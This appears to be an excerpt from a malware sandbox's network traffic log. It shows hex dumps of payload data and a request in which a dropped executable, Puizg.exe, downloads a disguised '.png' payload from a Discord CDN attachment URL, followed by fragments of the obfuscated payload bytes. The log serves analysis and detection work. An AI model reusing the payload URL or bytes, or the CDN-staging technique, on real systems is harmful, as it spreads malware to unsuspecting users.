                                                                                  2022-05-02 11:03:03 UTC2283INData Raw: 11 d3 20 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 c9 7b 04 00 08 2c 7e 61 84 48 d8 e4 20 bc c3 07 cd 20 00 00 01 81 38 00 00 01 49 39 02 11 00 00 01 50 38 04 00 05 e7 7d d2 60 18 04 00 05 e7 7b 02 02 00 00 01 d3 38 04 00 05 e7 7d d2 60 17 04 00 05 e7 7b 02 02 00 00 00 b4 38 00 00 02 2a 39 06 00 18 7b 28 04 00 0a 63 7e 02 ff ff ff cc 38 00 00 00 f3 39 08 0e 00 00 01 4a 38 04 00 05 e7 7d d2 60 1a 04 00 05 e7 7b 02 02 00 00 01 0e 38 04 00 05 e7 7d d2 60 1e 04 00 05 e7 7b 02 02 ff ff ff c5 38 04 00 05 eb 7d 05 0e 02 00 00 01 e4 38 00 00 01 bd 3b 15 07 0e ff ff ff 83 38 04 00 05 e7 7d d2 60 10 1f 04 00 05 e7 7b 02 02 00 00 00 43 38 00 00 01 a6 39 06 0e ff ff ff 8e 38 00 00 00 00 20 26 ff ff ff 99 39 04 00 08 0f 7b 04 00 08 2c 7e 00 00 00 01 20 00 00 00 d7 3a
                                                                                  Data Ascii: (&~a{,~aH 8I9P8}`{8}`{8*9{(c~89J8}`{8}`{8}8;8}`{C898 &9{,~ :
                                                                                  2022-05-02 11:03:03 UTC2299INData Raw: 02 4e 7f ca a8 28 05 2b 62 00 2a 06 00 0c bf 28 00 00 09 fe 00 34 3f 76 69 28 05 2b 4a 00 00 2a 04 00 05 c9 7e 2e 57 87 1f 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 05 c9 7e 5b 13 04 33 28 05 2b 42 ff ff ff c8 38 06 00 0f d3 28 04 00 08 39 7e 2a 00 00 00 00 38 04 00 05 c8 80 0a 00 00 23 28 06 00 0c bf 28 01 00 00 c1 20 00 00 00 00 38 06 00 0f d7 28 04 00 08 3a 7e 00 00 00 29 38 68 7f f1 ef 28 05 2b 00 00 00 00 00 00 00 44 00 02 30 03 00 2a 00 00 00 00 38 06 00 17 7f 28 04 00 0a 24 7e 06 00 17 8b 28 04 00 0a 27 7e 02 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 1f 7b 04 00 08 2c 7e 61 57 f5 7b df 20 59 68 ca 99 a4 20 de 95 d3 d1 20 06 00 16 77 28 04 00 09 e2 7e 0a 00 00 23 28 06 00 0c bf 28 02 00 00 ed 20 03 03 3b 60 65 34 28 05 2b 00 00 00 00 00 00 00 63 00 06
                                                                                  Data Ascii: N(+b*(4?vi(+J*~.W(+6*~[3(+B8(9~*8#(( 8(:~)8h(+D0*8($~('~(&~a{,~aW{ Yh w(~#(( ;`e4(+c
                                                                                  2022-05-02 11:03:03 UTC2315INData Raw: 2b 11 00 00 e0 00 00 01 80 00 04 30 13 00 00 2a 00 00 00 00 38 04 00 05 90 7d 16 03 7a 0a 00 01 2b 73 0a 00 01 70 28 0a 00 02 0a 28 00 0f 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e6 7b 04 00 08 2c 7e 61 5f a3 e6 74 20 45 16 fa 74 20 0a 00 02 0a 28 04 00 05 90 7c 03 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 09 7b 04 00 08 2c 7e 61 f9 9f ba 33 20 ee 42 84 60 20 00 00 00 00 38 00 00 00 62 3b 04 00 05 90 7b 03 02 64 49 8d 54 28 05 2b 00 00 00 00 00 00 00 82 00 05 30 03 00 00 ff ff ff c3 38 ff ff ff ee 3d 16 02 ff ff ff 96 38 ff ff ff c7 3a 03 7a 0a 00 01 d3 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 19 7b 04 00 08 2c 7e 61 e4 01 09 a6 20 93 fc 3c 03 20 2a 00 00 00 00 38 04 00 05 90 7d 02 03 7a 0a 00 01 8c 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 fd 7b
                                                                                  Data Ascii: +0*8}z+sp(((&~a{,~a_t Et (|(&~a{,~a3 B` 8b;{dIT(+08=8:zs(&~a{,~a < *8}zs(&~a{
                                                                                  2022-05-02 11:03:03 UTC2331INData Raw: 00 2d 38 00 00 00 43 3a 0a 00 02 0f 28 02 11 ff ff ff e6 38 00 13 04 00 05 77 7b 02 ff ff ff e6 38 ff ff ff d9 3b 17 00 11 00 00 00 46 38 00 00 00 71 40 1b 00 11 00 00 00 38 38 02 13 06 00 15 47 28 04 00 09 96 7e 02 2a 4e e0 01 12 00 00 00 31 38 60 6f e7 36 28 05 2b 11 00 00 d0 00 00 00 a8 00 04 30 13 ff ff fe 5c 38 02 13 04 00 05 77 7b 02 ff ff fe 55 38 06 00 14 d7 28 04 00 09 7a 7e 17 1e 02 ff ff fe 5d 38 ff ff fe 98 3b 1b 02 11 7a 06 00 14 ef 28 04 00 09 80 7e 02 2a 60 62 38 1f 6e 91 01 11 04 00 05 72 7d 58 17 01 11 01 13 04 00 05 72 7b 02 02 04 00 05 6e 7b 02 60 62 30 1f 6e 91 01 11 04 00 05 72 7d 58 17 01 11 01 13 04 00 05 72 7b 02 02 04 00 05 6e 7b 02 60 62 28 1f 6e 91 01 11 04 00 05 72 7d 58 17 01 11 01 13 04 00 05 72 7b 02 02 04 00 05 6e 7b 02 60
                                                                                  Data Ascii: -8C:(8w{8;F8q@88G(~*N18`o6(+0\8w{U8(z~]8;z(~*`b8nr}Xr{n{`b0nr}Xr{n{`b(nr}Xr{n{`
                                                                                  2022-05-02 11:03:03 UTC2347INData Raw: 86 38 58 2f 33 82 28 05 2b 11 00 00 b6 00 00 00 d3 00 03 30 13 00 2a 0a 00 01 df 6f 02 49 1a 43 6f 28 05 2b 3a 00 2a 0a 00 01 de 6f 02 5e 7f 70 63 28 05 2b 3a 00 2a 0a 00 01 dd 6f 02 6e 07 65 75 28 05 2b 3a 00 2a 0a 00 01 dc 6f 02 34 53 2e 60 28 05 2b 3a 00 2a 0a 00 01 db 28 02 3e 3e 08 d0 28 05 2b 3a 00 00 00 ff ff ff 5f 38 ff ff ff 67 39 0a 00 01 a0 28 0a 00 00 23 28 06 00 0c bf 28 01 00 00 86 20 02 2a 00 11 ff ff ff 77 38 00 00 00 05 00 00 00 08 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 08 00 00 00 08 00 00 00 05 00 00 00 13 45 00 11 2a 17 2a 68 1f ff ff ff b2 38 ff ff ff ba 39 0a 00 01 a0 28 0a 00 00 23 28 06 00 0c bf
                                                                                  Data Ascii: 8X/3(+0*oICo(+:*o^pc(+:*oneu(+:*o4S.`(+:*(>>(+:_8g9(#(( *w8E**h89(#(
                                                                                  2022-05-02 11:03:03 UTC2363INData Raw: 10 1f 07 11 d2 64 1e 07 11 d2 07 11 68 64 10 1f 08 11 68 08 11 05 11 ff ff ff 1a 38 08 13 6d 64 20 1f 00 11 2a 0a 00 01 9d 7e ff ff fe f0 38 ff ff ff 16 3b 18 02 11 ff ff ff bd 38 06 13 6d 64 20 1f 01 11 ff ff ff 9b 38 06 00 13 bb 28 04 00 09 33 7e 02 03 11 ff ff ff 26 38 ff ff ff 08 38 ff ff ff 0d 38 06 00 13 b3 28 04 00 09 31 7e 02 00 00 00 59 38 07 13 6d 01 11 00 00 00 9c 38 00 13 6a 16 ff ff ff 1e 38 00 00 00 00 20 26 ff ff ff 29 3a 04 00 08 27 7b 04 00 08 2c 7e 00 00 00 00 20 00 00 00 7e 3a 00 11 ff ff ff a2 38 00 13 06 00 13 db 28 04 00 09 3b 7e 02 ff ff ff 56 38 00 00 00 01 20 26 ff ff ff 61 3a 04 00 07 dd 7b 04 00 08 2c 7e 00 00 00 01 20 03 13 06 00 13 a7 28 04 00 09 2e 7e 02 00 00 00 bd 38 00 00 00 c8 3a 01 11 00 00 00 af 38 05 13 6d 00 11 ff ff
                                                                                  Data Ascii: dhdh8md *~8;8md 8(3~&888(1~Y8m8j8 &):'{,~ ~:8(;~V8 &a:{,~ (.~8:8m
                                                                                  2022-05-02 11:03:03 UTC2379INData Raw: 7a 00 00 2a 04 00 03 ca 7e 42 08 2f 0a 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 03 ca 7e 38 70 50 68 28 05 2b 42 00 2a 06 00 0f d3 28 04 00 08 39 7e 64 7b f7 6b 28 05 2b 4a 00 ff ff ff f4 38 01 13 00 11 2a 01 11 00 00 00 03 38 06 00 03 e9 28 69 8e 02 00 11 16 02 00 00 00 00 38 00 13 0a 00 00 17 28 69 8e 02 6e 62 40 d2 28 05 2b 11 00 00 39 00 00 00 33 00 05 30 13 2a 02 11 ff ff ff d1 38 01 13 01 fe 16 0a 00 00 c7 28 02 00 00 00 10 38 02 13 06 00 12 83 28 04 00 08 e5 7e 00 11 ff ff ff d2 38 ff ff ff ec 39 01 11 00 00 00 0c 38 00 13 0a 00 01 6b 28 02 7a 0a 00 01 2b 73 06 00 10 0f 28 04 00 08 48 7e fd 36 7d 31 20 00 00 00 41 38 35 74 00 7f 28 05 2b 11 00 00 7e 00 00 00 60 00 03 30 13 00 2a 00 00 00 00 38 0a 00 00 11 28 02 00 00 00 00 38 06 00 0f d7 28 04 00 08
                                                                                  Data Ascii: z*~B/(+6*~8pPh(+B*(9~d{k(+J8*8(i8(inb@(+930*8(8(~898k(z+s(H~6}1 A85t(+~`0*8(8(
                                                                                  2022-05-02 11:03:03 UTC2395INData Raw: 08 be 7e 61 06 00 11 db 28 04 00 08 bb 7e 06 00 11 e3 28 04 00 08 bd 7e 06 00 11 ef 28 04 00 08 c0 7e 06 00 11 c7 28 04 00 08 b6 7e 0a 00 00 23 28 06 00 0c bf 28 02 00 00 88 20 06 00 11 c7 28 04 00 08 b6 7e 0a 00 00 23 28 06 00 0c bf 28 02 00 00 8b 20 06 00 11 c7 28 04 00 08 b6 7e 0a 00 00 23 28 06 00 0c bf 28 02 00 00 8d 20 06 00 11 c7 28 04 00 08 b6 7e 0a 00 00 23 28 06 00 0c bf 28 02 00 00 8c 20 65 43 0b ba 28 05 2b 00 00 00 00 00 00 00 95 00 07 30 03 00 2a 00 00 00 00 38 0a 00 00 11 28 02 00 00 00 00 38 06 00 0f d7 28 04 00 08 3a 7e 49 26 ff 26 28 05 2b 8a 00 2a 06 00 0c bf 28 00 00 09 fe 00 63 7f 89 37 28 05 2b 4a 00 00 2a 04 00 03 ab 7e 50 08 ac 00 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 03 ab 7e 63 3b 55 d0 28 05 2b 42 00 2a 06 00 0f d3 28 04 00 08
                                                                                  Data Ascii: ~a(~(~(~(~#(( (~#(( (~#(( (~#(( eC(+0*8(8(:~I&&(+*(c7(+J*~P(+6*~c;U(+B*(
                                                                                  2022-05-02 11:03:03 UTC2411INData Raw: fd 38 dc 00 00 00 00 38 0a 00 00 77 28 26 11 00 00 00 00 38 00 00 00 11 39 38 11 ff ff f8 1b dd ff ff fe 9b 38 07 13 5f 61 01 11 58 00 11 27 ac 65 4f 20 07 11 ff ff fc a8 38 04 13 0a 00 00 98 73 14 11 ff ff f9 e9 38 ff ff fe 73 38 ff ff f9 ce 38 03 13 61 59 01 11 61 00 11 5e 3c 65 1d 20 03 11 ff ff f8 a3 38 00 00 00 01 20 26 ff ff f8 ae 39 04 00 08 30 7b 04 00 08 2c 7e 00 00 00 04 20 04 00 03 64 80 58 01 11 58 00 11 d7 ad 11 0a 20 ff ff f8 d2 38 00 00 00 01 20 26 ff ff f8 dd 39 04 00 07 cf 7b 04 00 08 2c 7e 00 00 00 00 20 04 00 03 67 80 68 61 68 66 65 65 66 66 65 66 65 66 58 01 11 59 00 11 c8 bb ec d1 20 06 00 11 6b 28 04 00 08 9f 7e 04 00 03 68 7e ff ff fc 64 38 ff ff fc d8 38 ff ff f9 bb 38 ff ff f4 ec dd ff ff f9 30 38 00 00 00 00 20 26 ff ff f9 3b 39
                                                                                  Data Ascii: 88w(&8988_aX'eO 8s8s88aYa^<e 8 &90{,~ dXX 8 &9{,~ ghahfeeffefefXY k(~h~d88808 &;9
                                                                                  2022-05-02 11:03:03 UTC2427INData Raw: 38 ff ff ff 95 3a 04 ff ff ff 9b 38 00 02 0b fe 06 00 00 bf 28 02 ff ff ff b7 38 00 00 00 1f 39 03 00 00 00 25 38 ff ff ff 2f dd 00 00 00 00 38 26 ff ff ff 3a dd 00 00 00 00 38 26 06 00 10 e3 28 04 00 08 7d 7e 1a 14 01 11 00 00 00 00 38 26 06 00 10 e3 28 04 00 08 7d 7e 1a 14 02 11 00 00 00 00 3e 38 0a 00 00 c8 28 04 02 11 00 00 00 65 38 00 00 00 75 3a 0a 00 00 c7 28 02 11 00 ff ff ff 69 38 00 00 00 00 20 26 ff ff ff 74 3a 04 00 08 09 7b 04 00 08 2c 7e 00 00 00 00 20 06 00 00 ce 28 0a 00 00 c6 28 06 00 10 0f 28 04 00 08 48 7e fd 36 68 5a 20 02 11 03 12 00 00 00 3c 38 06 00 10 df 28 04 00 08 7c 7e 03 12 00 00 00 11 38 02 13 06 00 00 c5 28 06 00 10 db 28 04 00 08 7b 7e 02 01 11 ff ff ff dd 38 00 00 01 9f 3a 04 00 02 fb 7b 02 2a 02 11 00 00 01 ad 38 00 00 01
                                                                                  Data Ascii: 8:8(89%8/8&:8&(}~8&(}~>8(e8u:(i8 &t:{,~ (((H~6hZ <8(|~8(({~8:{*8
                                                                                  2022-05-02 11:03:03 UTC2443INData Raw: fd 1f 02 ff ff ff 9b 38 00 00 00 00 20 26 ff ff ff a6 3a 04 00 08 01 7b 04 00 08 2c 7e 00 00 00 00 20 00 00 00 c0 39 5f 19 02 11 00 00 01 33 38 04 00 00 17 7d 0a 00 00 13 6f 04 00 00 06 7d 05 11 25 06 00 00 06 73 fe 1f 05 13 04 00 00 14 7b 02 02 00 00 01 b5 38 00 00 00 a6 00 00 01 d3 00 00 01 ba 00 00 00 03 45 00 04 0c fe 00 00 01 9a 38 01 13 04 00 00 11 7b 02 00 65 31 eb 02 28 05 2b 11 00 00 06 00 00 02 47 00 05 30 1b 00 00 00 00 11 00 1f 05 00 1a 00 02 00 00 10 01 00 ff ff ff c2 38 00 ff ff ff e5 38 00 13 04 00 00 11 7b 02 ff ff ff c8 38 00 00 00 12 3b fd 1f 00 11 2a 00 00 00 00 38 dc 00 00 00 00 38 06 00 10 03 28 04 00 08 45 7e 02 00 00 00 16 dd 00 00 00 00 38 38 00 00 00 21 40 17 00 11 00 00 00 38 38 5f 53 9d 64 28 05 2b 11 00 00 01 00 00 00 57 00 03
                                                                                  Data Ascii: 8 &:{,~ 9_38}o}%s{8E8{e1(+G088{8;*88(E~88!@88_Sd(+W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  2192.168.2.449775162.159.130.233443C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2022-05-02 11:03:15 UTC2445OUTGET /attachments/968108194327052308/970585558680223784/Nqdkg_Cbadgewx.png HTTP/1.1
                                                                                  Host: cdn.discordapp.com
                                                                                  Connection: Keep-Alive
                                                                                  2022-05-02 11:03:15 UTC2446INHTTP/1.1 200 OK
                                                                                  Date: Mon, 02 May 2022 11:03:15 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 1250816
                                                                                  Connection: close
                                                                                  CF-Ray: 705044f40e72912e-FRA
                                                                                  Accept-Ranges: bytes
                                                                                  Age: 9897
                                                                                  Cache-Control: public, max-age=31536000
                                                                                  ETag: "8b4e3118a9ad10f525d58287a5b3d59e"
                                                                                  Expires: Tue, 02 May 2023 11:03:15 GMT
                                                                                  Last-Modified: Mon, 02 May 2022 07:20:29 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: HIT
                                                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  x-goog-generation: 1651476029852442
                                                                                  x-goog-hash: crc32c=hwhX1A==
                                                                                  x-goog-hash: md5=i04xGKmtEPUl1YKHpbPVng==
                                                                                  x-goog-metageneration: 1
                                                                                  x-goog-storage-class: STANDARD
                                                                                  x-goog-stored-content-encoding: identity
                                                                                  x-goog-stored-content-length: 1250816
                                                                                  X-GUploader-UploadID: ADPycdvlLx3JracfYsvVBAgmX4a-C82nsbcn_2Up0RFqabos6mHUOzxh5QL4HNlUSOsot6bjxrgVH3mfckuvec55iPKWOozK8RZR
                                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q974GsHmpGKKb7QU40xpl8wG3bRXtybYhT%2FwCk4QJyU7vlV6RFJNu5%2B68AX91HMoM5thPkBzKzXvY8o9Rn%2FdDq1CkFZSIHHVDdDtiKkF2A7KUF30X38ZpOb%2BTLPRguMLq%2B8DIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  2022-05-02 11:03:15 UTC2447INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2022-05-02 11:03:15 UTC2448INData Raw: 00 00 02 00 00 00 04 00 00 00 00 00 00 00 3f 1f dd 48 64 00 01 00 00 1f dd 48 64 00 01 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 03 42 00 00 00 00 00 00 00 00 00 00 03 42 00 13 40 58 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: ?HdHdOFNI_NOISREV_SV4BB@XH0
                                                                                  2022-05-02 11:03:15 UTC2450INData Raw: 67 69 65 68 06 68 74 64 69 77 05 00 00 00 02 65 7a 69 53 2e 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 13 00 00 00 01 05 61 33 61 30 35 64 31 31 66 37 66 35 66 33 30 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 51 00 00 00 02 0c 00 00 00 00 00 00 00 01 ff ff ff ff 00 00 00 01 00 43 0b 00 00 00 01 08 00 00 00 01 00 00 00 2d 0f 00 00 00 26 09 00 00 00 01 00 00 00 2c 11 74 74 20 6d 6d 3a 68 07 00 00 00 55 06 6d 6d 3a 48 04 00 00 00 54 06 74 74 20 6d 6d 3a 68 68 08 00 00 00 53 06 00 00 00 27 09 00 00 00 04 00 00 00 2b 11 00 00 00 23 09 00 00 00 01 00 00 00 2a 11 64 64 2d 4d 4d 2d 79 79 79 79 0a 00 00 00 50 06
                                                                                  Data Ascii: giehhtdiweziS.gniwarD.metsySa3a05d11f7f5f30b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,gniwarD.metsySQC-&,tt mm:hUmm:HTtt mm:hhS'+#*dd-MM-yyyyP
                                                                                  2022-05-02 11:03:15 UTC2451INData Raw: 74 61 6d 72 6f 66 0b 79 6c 6e 4f 64 61 65 52 73 69 5f 6d 0c 73 72 61 64 6e 65 6c 61 43 6c 61 6e 6f 69 74 70 6f 11 73 65 6d 61 4e 61 72 45 68 73 69 6c 67 6e 45 76 65 72 62 62 61 5f 6d 17 73 65 6d 61 4e 61 72 45 76 65 72 62 62 61 5f 6d 10 73 65 6d 61 4e 61 72 65 5f 6d 0a 73 6e 72 65 74 74 61 50 65 6d 69 54 67 6e 6f 4c 6c 6c 61 13 73 6e 72 65 74 74 61 50 65 6d 69 54 74 72 6f 68 53 6c 6c 61 14 73 6e 72 65 74 74 61 50 65 74 61 44 67 6e 6f 4c 6c 6c 61 13 73 6e 72 65 74 74 61 50 65 74 61 44 74 72 6f 68 53 6c 6c 61 14 73 6e 72 65 74 74 61 50 68 74 6e 6f 4d 72 61 65 59 6c 6c 61 14 6e 72 65 74 74 61 50 65 6d 69 54 74 72 6f 68 73 10 6e 72 65 74 74 61 50 65 6d 69 54 67 6e 6f 6c 0f 6e 72 65 74 74 61 50 68 74 6e 6f 4d 72 61 65 79 10 6e 72 65 74 74 61 50 65 74 61 44 74
                                                                                  Data Ascii: tamrofylnOdaeRsi_msradnelaClanoitposemaNarEhsilgnEverbba_msemaNarEverbba_msemaNare_msnrettaPemiTgnoLllasnrettaPemiTtrohSllasnrettaPetaDgnoLllasnrettaPetaDtrohSllasnrettaPhtnoMraeYllanrettaPemiTtrohsnrettaPemiTgnolnrettaPhtnoMraeynrettaPetaDt
                                                                                  2022-05-02 11:03:15 UTC2452INData Raw: 61 12 6c 6f 62 6d 79 53 79 63 6e 65 72 72 75 63 0e 72 6f 74 61 72 61 70 65 53 6c 61 6d 69 63 65 44 79 63 6e 65 72 72 75 63 18 72 6f 74 61 72 61 70 65 53 70 75 6f 72 47 79 63 6e 65 72 72 75 63 16 72 6f 74 61 72 61 70 65 53 70 75 6f 72 47 72 65 62 6d 75 6e 14 72 6f 74 61 72 61 70 65 53 6c 61 6d 69 63 65 44 72 65 62 6d 75 6e 16 6e 67 69 53 65 76 69 74 61 67 65 6e 0c 6e 67 69 53 65 76 69 74 69 73 6f 70 0c 73 65 7a 69 53 70 75 6f 72 47 74 6e 65 63 72 65 70 11 73 65 7a 69 53 70 75 6f 72 47 79 63 6e 65 72 72 75 63 12 73 65 7a 69 53 70 75 6f 72 47 72 65 62 6d 75 6e 10 00 00 00 22 6f 66 6e 49 74 61 6d 72 6f 46 72 65 62 6d 75 4e 2e 6e 6f 69 74 61 7a 69 6c 61 62 6f 6c 47 2e 6d 65 74 73 79 53 25 00 00 00 04 04 00 00 00 7f 00 00 00 00 00 00 00 00 07 09 00 00 00 07 09
                                                                                  Data Ascii: alobmySycnerrucrotarapeSlamiceDycnerrucrotarapeSpuorGycnerrucrotarapeSpuorGrebmunrotarapeSlamiceDrebmunngiSevitagenngiSevitisopseziSpuorGtnecrepseziSpuorGycnerrucseziSpuorGrebmun"ofnItamroFrebmuN.noitazilabolG.metsyS%
                                                                                  2022-05-02 11:03:15 UTC2454INData Raw: 02 02 02 02 02 02 02 01 00 01 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 02 02 00 02 02 00 02 02 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 02 02 00 02 02 00 02 02 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 00 00 00 00 00 00 00 00 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 01 00 01 02 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 01 00 01 02 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 01 02 01 00 01 02 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03
                                                                                  Data Ascii:
                                                                                  2022-05-02 11:03:15 UTC2455INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2022-05-02 11:03:15 UTC2456INData Raw: e1 87 89 cc 06 61 33 61 30 35 64 31 31 66 37 66 35 66 33 30 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 20 2c 65 7a 69 53 2e 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 66 39 38 30 65 34 33 39 31 36 35 63 35 61 37 37 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 62 69 6c 72 6f 63 73 6d 20 2c 6f 66 6e 49 65 72 75 74 6c 75 43 2e 6e 6f 69 74 61 7a 69 6c 61 62 6f 6c 47 2e 6d 65 74 73 79 53 6d 39 38 30 65 34 33 39 31 36 35 63 35 61 37 37 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74
                                                                                  Data Ascii: a3a05d11f7f5f30b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,gniwarD.metsyS ,eziS.gniwarD.metsySf980e439165c5a77b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,bilrocsm ,ofnIerutluC.noitazilabolG.metsySm980e439165c5a77b=nekoTyeKcilbuP ,lart
                                                                                  2022-05-02 11:03:15 UTC2458INData Raw: 44 5e b9 4b 08 25 58 df ae 0e 64 73 e3 ca cc 98 b8 1a 00 c7 21 2e d6 23 0c 07 7f 88 61 48 c6 44 71 ce 3b 18 0e c3 41 bb 3d 9b 27 a9 92 5f ee d7 28 01 20 5d db 83 41 bb 31 99 00 6a 8a 48 9b 88 b1 bc 77 5b 74 9d 0b 7a 37 15 4c d1 71 97 48 e0 7e 42 58 dc 85 68 12 9b 86 ee 38 8f 08 38 30 c7 b1 55 1d 14 a0 69 0f 09 a0 d2 13 71 dc ee d2 91 74 bc d9 f2 6a be 8e 96 59 33 ed 38 3c 76 5f a8 b8 0b ca 5e 5f 1a e8 2c 6a 74 3f bf ac d6 bb 77 7d cb 66 47 7d 52 d4 37 7f 96 2c 39 cb ff d4 19 65 07 16 5e 4a df 74 09 40 d9 fd 6c d4 b3 f3 76 79 c4 38 f6 0d af e1 94 97 66 26 7b 99 5e 27 92 52 07 bc ef b9 2d 3d b6 1c 38 10 3a 55 7e b5 2d 97 93 d7 98 f1 42 b0 65 00 26 c7 f2 05 ba 96 b5 a0 fb 43 17 57 6e 7b 7b 93 97 44 60 8a cb 46 bb 39 9f 04 2f 14 f7 76 a5 c7 78 3f ca 43 98 77
                                                                                  Data Ascii: D^K%Xds!.#aHDq;A='_( ]A1jHw[tz7LqH~BXh880UiqtjY38<v_^_,jt?w}fG}R7,9e^Jt@lvy8f&{^'R-=8:U~-Be&CWn{{D`F9/vx?Cw
